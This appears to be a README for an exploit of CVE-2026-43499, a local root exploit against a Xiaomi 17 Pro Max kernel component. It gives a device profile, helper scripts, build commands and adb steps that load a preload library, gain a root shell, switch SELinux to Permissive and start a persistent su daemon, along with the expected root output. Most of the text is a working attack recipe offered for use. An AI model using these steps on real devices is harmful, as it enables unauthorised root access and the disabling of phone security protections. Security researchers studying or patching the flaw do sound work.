Share
## https://sploitus.com/exploit?id=7BD5D8CE-341C-5128-A9AE-5B4764B1ABFF
# CVE-2026-43499 for `popsicle`

This repository contains the exploit for CVE-2026-43499 targeting Xiaomi 17 Pro Maxโ€™s `popsicle` component. This exploit is applicable to devices with a kernel version of `6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k` (tested on versions `popsicle_images_OS3.0.313.0.WPBCNXM_16.0` and `popsicle_images_OS3.0.315.0.WPBCNXM_16.0`). ## `popsicle` Profile

```json
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000",
  "target_device_path": "/dev/uinput",
  "direct_root_cpu": 7
}
```

The first two physical addresses can be derived from the memory layout of a rooted device by reading `/proc/iomem`:

```sh
python3 detect_offset.py
```

This script automatically reads the memory layout of the first available device using `adb shell su -c` and prints the two profile fields. The last two fields can be obtained by running the following script:

```sh
python3 detect_device.py
```

## Generate the target

Requires Python 3 and `llvm-objdump`:

```sh
python3 generate_target.py \
  --boot boot.img \
  --profile profile.json \
  -o source/src/target.h
```

## Compile

```sh
make -C source clean preload
```

If NDK cannot be automatically detected:

```sh
NDK_ROOT=/path/to/android-ndk make -C source clean preload
```

Output:

```text
source/build/bin/preload.so
```

## Run

```sh
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
```

Upon success, the following output will be displayed:

```text
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
```

After obtaining `init_cred`, switch SELinux to Permissive, and reload the current policy. Then install `/data/local/tmp/su`, use `adb mount` to access the `su` namespace, and start the `su` daemon that runs continuously during the current boot cycle. This setting will take effect after rebooting. ## Limitations

After exploiting this vulnerability, newly launched app processes may not complete the Framework initialization process. Restarting the device will restore this functionality.